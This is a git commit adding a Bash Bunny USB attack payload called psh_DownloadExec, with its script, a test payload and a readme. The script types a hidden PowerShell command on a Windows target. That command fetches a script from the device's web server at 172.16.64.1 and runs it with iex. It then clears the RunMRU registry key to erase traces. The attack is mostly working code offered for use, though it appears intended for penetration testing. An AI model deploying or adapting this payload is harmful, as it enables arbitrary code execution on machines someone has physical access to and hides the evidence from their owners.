Added psh_DownloadExec payload (#110)

* [PAYLOAD] psh_DownloadExec

* readme

* Better status check and borrowed improvments from Hak5Darren

* Updated for BashBunny v1.1_x

* markdown fix

payloads/library/psh_DownloadExec/payload.txt

@@ -0,0 +1,69 @@
+#!/bin/bash
+#
+# Title:         Powershell Download and Execute
+# Author:        LowValueTarget
+# Version:       1.1
+# Category:      Powershell
+# Target:        Windows XP SP3+ (Powershell)
+# Attackmodes:   HID, RNDIS_ETHERNET
+# Firmware:      >= 1.1
+# 
+# OPTIMIZED FOR BASHBUNNY 1.1_x+
+#
+# Quick HID attack to retrieve and run powershell payload from BashBunny web server - ensure psh.txt exists in payload directory
+# 
+# | Attack Stage        | Description                              |
+# | ------------------- | ---------------------------------------- |
+# | Stage 1             | Running Initial Powershell Commands      |
+# | Stage 2             | Turning up web server and DHCP           |
+# | Stage 3             | Delivering powershell payload            |
+#
+
+LED SETUP
+
+# Set working dir
+PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
+cd $PAYLOAD_DIR
+SERVER_LOG=server.log
+
+# Fresh Server Log
+rm -f $SERVER_LOG
+# Disable ICMP/echo replies so our powershell stager doesn't attempt to access the SMB share before smbserver starts (workaround since Test-NetConnection 172.16.64.1 SMB only works on powershell 4.0+ for Windows 8+)
+echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all
+
+# Check for psh.txt
+if [ ! -f $PAYLOAD_DIR/psh.txt ]; then
+    LED FAIL
+    exit 1
+fi
+
+# Attack HID
+ATTACKMODE HID
+LED STAGE1
+
+# Attack
+RUN WIN "powershell -WindowStyle Hidden \"while (\$TRUE) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { iex (New-Object Net.WebClient).DownloadString('http://172.16.64.1/psh.txt'); (New-Object Net.WebClient).DownloadString('http://172.16.64.1/COMPLETE'); exit } }\""
+
+# Wipe prints
+RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue\""
+
+# Attack Ethernet
+LED STAGE2
+ATTACKMODE RNDIS_ETHERNET
+
+# Start web server
+iptables -A OUTPUT -p udp --dport 53 -j DROP # disallow outgoing dns requests so server starts immediately
+python -m SimpleHTTPServer 80 > $SERVER_LOG 2>&1 &
+
+# wait until python web server is listening
+while ! nc -z localhost 80; do sleep 0.2; done
+
+# Re-enable ICMP/echo replies to trip the powershell stager
+echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all
+LED STAGE3
+
+while ! grep -Fq "GET /COMPLETE" $SERVER_LOG; do
+    sleep .5
+done
+
+LED FINISH

payloads/library/psh_DownloadExec/psh.txt

@@ -0,0 +1 @@
+powershell "New-Item $ENV:UserProfile\Desktop\psh_downloadexec_test.txt -ItemType file"

payloads/library/psh_DownloadExec/readme.md

@@ -0,0 +1,26 @@
+# psh_DownloadExec
+## Powershell Download and Execute
+
+* Author: LowValueTarget
+* Version: Version 1.1
+* Target: Windows XP SP3+ (Powershell)
+* Category: Powershell
+* Attackmodes: HID, RNDIS_Ethernet
+* Firmware: >= 1.1
+
+## Description
+
+Quick HID attack to retrieve and run powershell payload from BashBunny web server.
+
+## Configuration
+
+Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
+
+## STATUS
+```
+| Attack Stage        | Description                              |
+| ------------------- | ---------------------------------------- |
+| Stage 1             | Running Initial Powershell Commands      |
+| Stage 2             | Turning up web server and DHCP           |
+| Stage 3             | Delivering powershell payload            |
+```